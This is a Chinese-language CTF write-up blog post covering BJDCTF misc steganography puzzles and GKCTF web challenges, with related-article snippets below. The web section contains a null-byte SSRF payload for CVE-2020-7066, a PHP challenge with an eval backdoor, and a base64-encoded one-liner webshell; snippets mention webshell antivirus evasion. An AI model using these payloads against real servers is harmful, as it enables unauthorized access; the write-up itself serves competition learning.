2021-3-15 misc+web

最新推荐文章于 2021-11-30 18:07:03 发布
最新推荐文章于 2021-11-30 18:07:03 发布
阅读量302 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51792282/article/details/114851955
版权

[BJDCTF 2nd]小姐姐-y1ng

是这样的,馋她身子,但是为什么,这里被切了一刀
在这里插入图片描述
。。。一千年以后。。。
是我多虑了
在这里插入图片描述
以后不要只搜索flag了
呜呜呜

[BJDCTF 2nd]圣火昭昭-y1ng

我去,在属性里
找得我猝不及防
在这里插入图片描述
与佛论禅,没参透。。。
搜了半天找到个新佛曰的,这回参透了
http://hi.pcmoe.net/buddha.html
解密出gemlovecom,按提示去掉com,交flag
失败,知道为啥失败吗?
因为太菜了(笑哭)
有一款隐写工具outguess

这里是安装
https://www.cnblogs.com/2f28/p/9740347.html
-r 解密
-k ‘密码’
1.txt 输出文件
在这里插入图片描述

wdnmd_misc_1s_so_Fuck1ng_e@sy

[GKCTF2020]cve版签到

也就会做个签到题了
在题目上hint1:cve-2020-7066
查?
查!
卧槽直接查到了writeup。。。
)(略过)(

PHP
7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。

一个有关这个复现的博客
https://www.cnblogs.com/Ky1226/p/14332110.html
在这里插入图片描述

?url=http://127.0.0.1%00www.ctfhub.com

提示必须以123结尾
那就改!

?url=http://127.0.0.123%00www.ctfhub.com

Ohhhhhh

[GKCTF2020]CheckIN

<title>Check_In</title> 
<?php  
highlight_file(__FILE__); 
class ClassName 
{ 
        public $code = null; 
        public $decode = null; 
        function __construct() 
        { 
                $this->code = @$this->x()['Ginkgo']; 
                $this->decode = @base64_decode( $this->code ); 
                @Eval($this->decode); 
        } 

        public function x() 
        { 
                return $_REQUEST; 
        } 
} 
new ClassName();

构造函数
__construct()

function __construct( $par1, $par2 ) {
   $this->url = $par1;
   $this->title = $par2;
}

$runoob = new Site(‘www.runoob.com’, ‘菜鸟教程’);

主要用来在创建对象时初始化对象, 即为对象成员变量赋初始值,在创建对象的语句中与 new 运算符一起使用。

传参Ginkgo,值为base64化的php语句

来个一句话

ZXZhbCgkX1BPU1RbYV0pOw==

直接连,成功!
个锤子!
在这里插入图片描述

这是什么???

这是一个没有找到命令的错误返回值

大意。。。权限不够

wdnmd,睡觉
晚安

ProbeN1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip
ISCC2021 Web WP
Atkx's Blog
05-27 1759
目录WebISCC客服冲冲冲(一)这是啥Web01登录which is the true isccMISCRetrieve the passcode海市蜃楼-1 Web ISCC客服冲冲冲(一) 又到了一年一度的ISCC,客服一号为了保住饭碗(被迫)参与了今年的客服海选投票。经过激烈的角逐,客服一号终于凭借着自己多年的客服经验来到决赛的舞台,却发现对手竟是自己??? 请帮助真正的客服一号在投票中取胜,保住客服一号的饭碗! 题目入口:http://39.96.91.106:7020 这是啥 这是什么东西呢?
ISCC2021——web部分
ki10Moc的博客
05-26 1305
ISCC客服冲冲冲(一) 该题目需要左边的客服票数高于右边的 我会的就两种方法,毕竟是废物,允许 1、 把左右按钮换一下 然后就 2、在控制台输入 回车,走你 你涨啊,涨啊,接着涨啊…没吃饭吗 这是啥 发现一堆这 Jsfuck解密。 Web01 太明显了 robots协议 和攻防世界如出一辙,不让访问那就访问 得到源码 <?php <p>code.txt</p> if (isset ($_GET['password'])) { if (p
iscc2021 easyweb
woshilnp的博客
05-24 718
iscc easyweb 考点:无列名sql盲注 payload: import requests url = "http://39.96.91.106:5001/?id=" result = "" i = 0 while (True): i = i + 1 head = 32 tail = 127 while (head < tail): mid = (head + tail) >> 1 payload = "1'
ISCC2021wp
outman23的博客
05-31 466
Web ISCC客服冲冲冲(一) 方法一 打开chome浏览器在控制台中打入以下代码 setInterval(function(){document.getElementById("ISCC客服一号").click();},1000); ​ 方法二 F12 调换两者投票的位置 这是啥 把代码块复制到 chome concole 里运行 得到源码 iscc{what_is*_jsJS&} Web01 进入题目后 然后看一下robots.bot协议 提示code.code.txt,打开看一下
2021-信息安全与数据恢复方向竞赛-实践操作竞赛样题-第1天任务(1)0001.docx
12-15
2021-信息安全与数据恢复方向竞赛-实践操作竞赛样题-第1天任务(1)0001.docx 本文档是2021年全国行业职业技能竞赛第二届全国电子信息行业新技术应用职业技能大赛计算机网络管理员(信息安全与数据恢复)实践操作竞赛...
misc-流量分析+解析.zip
10-10
里面很多学习的数据包 也有答案 过程 都是很值得学习的
PowerShell-Misc:其他PowerShell
04-08
3. **对象和数据类型**:PowerShell中的数据是基于对象的,理解如何处理字符串、数组、哈希表等数据类型,以及如何使用`Select-Object`、`Where-Object`和`Sort-Object`等Cmdlets对数据进行操作。 4. **PowerShell...
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
misc04-音频隐写
04-20
和图片一样,数字音频也可以用于信息隐写 - 音频载体信号存在冗余,为隐蔽信息提供支持 - 人类听觉系统频谱范围是20Hz18kHz,但对2kHz4kH信息最为敏感 - 人类听觉系统只对相对相位敏感,而无法感知绝对...
ISCC2021线上赛赛题.zip
05-19
ISCC2021线上赛赛题.zip wp见主页
2021ISCC 部分web writeup
鸣蜩十四的博客
05-30 297
ISCC客服冲冲冲(一) 在这道题目中让左边的票数超过右边的票数,我第一反应是写一个脚本刷票,而且看起来没有限制ip多次投票,所以写了一个比较简单的python自动点击投票 from selenium import webdriver driver = webdriver.Chrome("C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe") driver.get("http://39.96.91.106:7020/test
ISCC2021——wp
m0_46296905的博客
11-30 1631
文章目录一、MISC(二)Retrieve_the_passcode(二)海市蜃楼-1(三)区块链(四)小明的宠物兔(五)小明的表情包二、Mobile(一)Mobile Normal(二)Mobile Easy三、Reverse(一)Garden(二)Analysis 一、MISC (二)Retrieve_the_passcode ARCHPR不能破解RAR5.0版本的rar文件 import numpy as np import matplotlib.pyplot as plt from mpl_tool
ISCC 2021—WP(部分)
h_adam的博客
05-25 793
tornado get传参: file?filename=/fllllllllllllaaaaaag&filehash=38c08fe238ff919895a95980aa92c53e 这里显示error,传入什么显示什么,filename我们已经知道了,那显示错误就是filehash错误。msg存在模板注入,从hints中可以看出可以通过md5求出filehash。 需求cookie_sercet,通过{{handler.settings}} 可以读到cookie_secret,得: {'
ISCC之web1
05-02 155
由题意知,爆破可行。 简单说一下抓包过程,第一个抓到的POST包直接放掉,右键扫描站点,扫出来第二个POST包,第二个POST包cookie,验证码,密码均为空,于是我开始尝试去利用, 经过几次repater测试过后,发现,返回包只返回密码错误,而不是验证码错误,于是拿去直接爆破。 抓包发现,验证码没有用到,只是一个摆设 flag is flag{99...
ISCCweb1
ChenZIDu的博客
09-22 582
<?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($value[$i] > 32 &&a...
ISCC
Leo8283的博客
05-02 2640
ISCC客服冲冲冲 这里肯定是写一个脚本去自动化点击左边那个按钮,我本来想不会,百度一下发现还是很简单的一串js,果然还是要去学习脚本语言 console里添加 setInterval(function(){document.getElementById("按钮id").click();},1); setInterval(function(){document.getElementById("left_button").click();},1); https://www.jb51.net/article
ISCC2021-部分题目再现
weixin_51706044的博客
05-29 1297
文章目录一、easyweb二、ISCC客服冲冲冲(一)这是啥Web01ISCC客服一号冲冲冲(二) 一、easyweb 很明显,本题需要进行sql注入但是并不知道注入点 二、ISCC客服冲冲冲(一) 可以直接进行改票,但是会被检测到刷票行为 既然不发进行刷票,那就直接把对方的投票按钮给他关闭! 我们可以通过火狐浏览器F12进入开发者模式,对源码进行修改直接讲对方的投票按钮删除???? 可以看到对方以及在五六十票左右,因此我们需要进入后快速开发者模式,修改后在20s内点到票数超过对方就好了 这是啥
利用注释及自定义加密免杀Webshell
zhangge3663的博客
01-04 431
0x00:简介 此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 由于php7.1以后assert不能拆分了,所以此篇不使用assert函数作为核心,使用适用性更广的eval。 免杀顺序依次为D盾 河马 webdir+ 0x01:探究免杀 免杀D盾 首先我们需要了解免杀的原理,免杀其实就是绕过杀软的规则,而规则对我们来说是不透明的,但是可以根据fuzz探知个大概。 首先请出我们的一句话木马: <?php @eval($_POST('a'));?> 无论如何混淆
webmisc那个就业
最新发布
09-19
在当今的数字时代,WebMisc(其他)领域都是就业市场上具有潜力和广阔发展空间的行业。 首先,在Web领域,随着互联网的不断发展和普及,对于网站的需求也越来越大。从企业的官方网站到电子商务平台,从社交媒体到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值